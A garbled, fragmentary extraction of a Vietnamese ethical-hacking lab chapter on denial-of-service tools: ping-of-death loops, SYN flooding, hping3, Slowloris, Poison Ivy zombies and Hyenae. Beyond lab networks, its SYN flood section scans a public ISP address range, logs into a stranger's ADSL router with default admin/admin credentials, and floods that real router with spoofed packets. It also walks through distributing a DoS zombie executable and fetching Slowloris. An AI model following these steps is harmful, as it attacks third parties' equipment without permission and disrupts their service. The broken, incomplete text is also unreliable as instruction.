Professional Documents
Culture Documents
Chuong 5 Module DoS DDoS
Chuong 5 Module DoS DDoS
Athena Ethical
Hacker Lab
DoS và DDoS Module
Ping of Dealth
SYN Flood
Hping3 SYN Flood
PHP DoS
Apache DoS Slowloris
Poison Ivy
Hyenae
LAB DOS và DDoS attack
1. Ping of Dealth Attack
- Sơ đồ bài lab
Router
234 254
192.168.1.0/24
Attacker
- Trong hệ điều hành Window để ta có thể sử dụng lệnh “ping IP -t -l 5000” để ping một
destination một cách liên tục
- Nếu như bạn muốn mở cùng một lúc 20 cửa sổ Window ping thì ta có thể kết hợp với câu lệnh
For như sau “ For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 ” như vậy chương
trình sẽ mở ra cùng một lúc 20 cửa sổ window ping liên tục đến IP 192.168.1.254
234 254
192.168.1.0/24
Attacker
118.68.26.1
- ở bài lab này ta sẽ thử thực hiện SYN Flood Attack vào router ADSL. Đầu tiên ta xác định xem
hiện tại đang có bao nhiêu router ADSL đang mở port 80 bằng công cụ Nmap
- Giả sử IP Public hiện thời của mình đang là 118.68.226.103, ta sử dụng câu lệnh “nmap –sS –p
80 118.68.226.1/24 ” để scan
Kiểm tra nội dung file scan_adsl.txt và chọn ra một IP để ta làm lab tiếp tục
- Ta vào trình duyệt web để kiểm tra IP trang web của IP này và thử nhập vào username: admin và
password admin mặc định
- Ta sẽ thực hiện syn flood attack vào port 80 trên router ADSL này bằng công cụ syn-flood-
alpha1.tar.gz. Ta thực hiện quá trình cài đặt giống như bên dưới.
root@bt:~/Desktop# ls
scan_adsl.txt syn-flood-alpha1.tar.gz
root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz
syn-flood/
syn-flood/Makefile
- Ta thực hiện quá trình tấn công bằng câu lệnh bên dưới để gửi ra 100000 gói tin syn
root@bt:~/Desktop/syn-flood# ./syn-flood
Usage: ./syn-flood --ip IP --port PORT [verbose]
-h --help Display this usage information.
-i --ip Destination IP address.
-p --port Destination port.
-n --num Number of packets to send.
-v --verbose Print verbose messages.
- Ta sử dụng chương trình Wireshark để phân tích quá trình hoạt động của công cụ này thì thấy
chương trình đã gửi ra 100000 gói tin TCP SYN đến victim và router adsl với IP 118.68.226.7 với
các source IP là các IP giả khác nhau.
- Sơ đồ bài lab
Attacker
100
Router
254
101 192.168.1.0/24
root@bt:~#man hping3
=> Kiểm tra các thông số của hping3
- Tại máy Victim nếu như bị SYN Flood ta kiểm tra trạng thái kết nối bằng lệnh “netstat -ano” thì
thấy xuất hiện rất nhiều kết nối SYN
- Ta sử dụng trình duyệt web kết vào trang PHP DoS và thực hiện tấn công vào victim nào đó
- Sau khi attack xong thì chương trình sẽ thống kê lại cho ta số lượng gói tin. –
- Slowrist ảnh hưởng đến Web Server Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer.. còn
các web server của Window IIS 6.0, IIS 7.0 thì không ảnh hưởng bởi công cụ này
- Download source code chương trình tại trang http://ha.ckers.org/slowloris/slowloris.pl và tạo
thành file có tên là slowloris.pl
- Gán cho chương trình có quyền thực thi
- Chương trình yêu cầu ta phải nhập vào PASSWORD hoặc là ta phải LOAD KEY tùy thuộc vào
phương thức password cấu hình ở trên
- Tiếp tục ta thực hiện công việc phát tán file zombie dos_server.exe
- Ta Double-click vào dòng biểu thị cho client, để hiển thị đầy đủ các tác vụ mà attacker có thể
làm đối với zombie ( tùy thuộc vào cấu hình ban đầu )
- Cấu hình hyenaed.exe lắng nghe trên máy tính server 2003
C:\>hyenaed.exe -I 1 -a 192.168.1.100 –p 8888 –u 10000 –k 123abc!!!
-I: card kết nối vào
-a: bind với IP của máy hoạt động chương trình hyenaed
-p: port
-u: số lượng packet gửi cho mỗi lần kết nối